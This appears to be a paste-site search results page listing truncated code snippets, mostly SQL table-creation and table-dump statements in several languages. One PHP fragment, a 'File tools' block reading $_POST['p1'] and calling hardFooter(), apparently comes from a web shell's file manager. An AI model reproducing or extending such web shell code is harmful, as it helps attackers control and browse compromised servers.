42.7K results in 812 ms
5 years ago · Jul 12, 2020, 12:26 PM
true but 'pretty' is not. -- -- null -- If this exists with a string value, table elements with this value
5 years ago · Jul 12, 2020, 11:50 AM
delete from test """) sqliter.execute(""" create table if not exists test (id int) """) sql
5 years ago · Jul 11, 2020, 09:24 PM
SHOW CREATE TABLE `'.$table.'`'); $create = @mysqli_fetch_array($res); $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n"; if($fp) fwrite($fp,
5 years ago · Jul 11, 2020, 09:10 PM
Users(Id TEXT, Notification BOOLEAN); CREATE TABLE IF NOT EXISTS Weather(Weather TEXT, MinTemp REAL,
5 years ago · Jul 11, 2020, 07:54 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
5 years ago · Jul 11, 2020, 03:10 PM
for cms_news -- ---------------------------- DROP TABLE IF EXISTS `cms_news`; CREATE TABLE `cms_news` ( `id` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(255)
5 years ago · Jul 11, 2020, 07:16 AM
COLUMN_QUANTITY = "quantity" val CREATE_PRODUCTS_TABLE = "CREATE TABLE IF NOT EXISTS $TABLE_PRODUCTS ($COLUMN_ID INTEGER PRIMARY
5 years ago · Jul 10, 2020, 06:10 PM
init(name): conn=db.connect(("{xyz}.db").format(xyz=name,)) cur=conn.cursor() sql = ''' create table if not exists credit( date string, title
5 years ago · Jul 10, 2020, 05:42 PM
at Yan'an, Shaanxi province. If not for Shen Kuo's writing,the
5 years ago · Jul 10, 2020, 02:56 PM
is found or FALSE if not found. */ function user_external_load($authname) { $uid
5 years ago · Jul 10, 2020, 02:26 PM
for table `ChandlerACLGroupsPermissions` -- DROP TABLE IF EXISTS `ChandlerACLGroupsPermissions`; /*!40101 SET @saved_cs_client
5 years ago · Jul 10, 2020, 02:16 PM
for table `ChandlerACLGroupsPermissions` -- DROP TABLE IF EXISTS `ChandlerACLGroupsPermissions`; /*!40101 SET @saved_cs_client
5 years ago · Jul 10, 2020, 01:22 PM
size specification is optional. If it is not specified, there is no
5 years ago · Jul 10, 2020, 07:34 AM
init(name): conn=db.connect(("{xyz}.db").format(xyz=name,)) cur=conn.cursor() sql = ''' create table if not exists credit( date string, title
5 years ago · Jul 09, 2020, 10:42 PM
entry ("..tostring(k).." => "..tostring(v)..") in Create body", 2) end end --apply constructor function if it exists if ctor then ctor(obj)
5 years ago · Jul 09, 2020, 10:18 PM
sqlite3.connect(location) self.sql = self.x.cursor() write = 'create table if not exists cars (kjennemerke TEXT, data
5 years ago · Jul 09, 2020, 10:08 PM
init(name): conn=db.connect(("{xyz}.db").format(xyz=name,)) cur=conn.cursor() sql = ''' create table if not exists credit( date string, title
5 years ago · Jul 09, 2020, 08:06 PM
sizeof(Nome), "%s", sBody) SQL_FastQuery(WAAC, "CREATE TABLE IF NOT EXISTS waac (name VARCHAR(100) NOT
5 years ago · Jul 09, 2020, 06:20 PM
sqlite3.connect('carinfoDB.db') cursor = conn.cursor() _SQL = 'CREATE TABLE IF NOT EXISTS carinfo(ID INTEGER PRIMARY KEY
Total pages: 2134